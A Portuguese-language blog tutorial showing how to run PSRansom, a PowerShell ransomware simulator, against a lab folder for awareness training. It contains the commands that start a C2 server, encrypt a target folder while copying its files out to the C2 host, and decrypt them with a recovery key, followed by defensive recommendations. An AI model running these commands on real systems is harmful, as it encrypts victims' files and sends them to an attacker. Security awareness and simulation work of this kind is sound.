PSRansom - Simulação de Ransomware com C2

PSRansom ​​é um script escrito em PowerShell que permite simular o funcionamento de um Ransomware. É um script que você pode utilizar por exemplo em uma apresentação de conscientização sobre os riscos e o impacto que um ransomware pode causar.

🔴 O uso indevido desta técnica é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.

01 - Passo

Realize o clone do projeto PSRansom

Linux 
git clone https://github.com/JoelGMSec/PSRansom

cd PSRansom

ls -l

02 - Passo

Inicie o C2 Server através do comando a seguir :

Linux 
pwsh C2Server.ps1 + 80

03 - Passo

No host Windows criei a pasta 100SECURITY com alguns arquivos como exemplo.

04 - Passo

Realize o download do PSRansom no Windows e execute o comando a seguir:

  • C:\100SECURITY : Pasta Alvo
  • 192.168.0.76 : Servidor C2
  • 80 : Porta de conexão com o servidor C2
  • -x : Realiza a cópia dos arquivos para o servidor C2
PoweShell 
.\PSRansom.ps1 -e C:\100SECURITY -s 192.168.0.76 -p 80 -x

05 - Passo

No servidor C2 o atacante recebe a lista de arquivos que foram criptografados e a Chave de Recuperação.

Linux 
Chave de Recuperação : WNLmTxjnDpzZGaEF4AsUYgi5

Arquivos criptografados com a extensão .psr

06 - Passo

Dentro da pasta C2Files o atacante recebe uma cópia de todos os arquivos antes da criptografia.

Linux 
cd CS2Files

ls -l

07 - Passo

Observe que foi criado o arquivo readme.txt contendo a Chave de Recuperação dos arquivos.

Windows 
Recovery Key : WNLmTxjnDpzZGaEF4AsUYgi5

08 - Passo

Para recuperar os arquivos basta digitar o comando a seguir :

PoweShell 
.\PSRansom.ps1 -d C:\100SECURITY -K WNLmTxjnDpzZGaEF4AsUYgi5

Arquivos recuperados com sucesso!

🔴   Exibindo uma mensagem da Tela do Usuário

Para exibir a mensagem basta utilizar o parâmetro -demo :

PoweShell 
.\PSRansom.ps1 -e C:\100SECURITY -s 192.168.0.76 -p 80 -x -demo

💀 Mensagem!


Se o usuário clicar em Pay Now! é exibido um pop-up na tela.

🔓 Observações

O impacto e o prejuízo financeiro que este tipo de ataque por causar nas empresa é muito grande, segue algumas recomendações :

  • Conscientize de forma constante os colaboradores da sua empresa, sobre os riscos de segurança
  • Realize exercícios e simulações de Phishing, Ransomware, Engenharia Social, etc.
  • Invista em soluções de segurança como EDRs, AVs, Firewall, WAF, etc.
  • Se possível monte um time interno de segurança em sua empresa para realizar simulações de ataques reais.
  • Contrate uma consultoria especializada para avaliar seu ambiente de forma independente e periódica.
  • Leve a segurança dos dados da sua empresa e de seus clientes a sério!

👍 Se este artigo te ajudou compartilhe!



  Autor

Marcos Henrique

 São Paulo/SP



  Ransomware

© 2024 - 100SECURITY

Contato